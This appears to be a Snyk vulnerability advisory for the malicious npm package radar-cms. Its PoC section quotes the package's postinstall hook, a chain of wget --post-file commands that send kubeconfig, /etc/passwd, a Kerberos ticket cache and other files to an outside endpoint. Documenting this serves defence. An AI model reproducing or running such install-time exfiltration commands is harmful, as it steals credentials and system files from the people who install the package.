Malicious Package Affecting radar-cms package, versions *


0.0
critical

Snyk CVSS

    Exploit Maturity Mature
    Attack Complexity Low
    User Interaction Required
    Scope Changed
    Confidentiality High
    Integrity High
    Availability High

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-RADARCMS-1082856
  • published 4 Mar 2021
  • disclosed 4 Mar 2021
  • credit Snyk Security Research

Introduced: 4 Mar 2021

Malicious CVE NOT AVAILABLE CWE-506 Open this link in a new tab
First added by Snyk

How to fix?

Avoid using radar-cms altogether.

Overview

radar-cms is a malicious package. The package was found to have a post-install command which when executed will exfiltrate multiple files from a host machine.

PoC

"postinstall": "wget --post-file ~/.kube/config https://entfet95itcxpuu.m.pipedream.net;wget 
--post-file package.json https://entfet95itcxpuu.m.pipedream.net;wget --post-file /etc/passwd 
https://entfet95itcxpuu.m.pipedream.net;wget --post-file /tmp/krb5cc_0
 https://entfet95itcxpuu.m.pipedream.net;wget --post-file /etc/hosts 
https://entfet95itcxpuu.m.pipedream.net"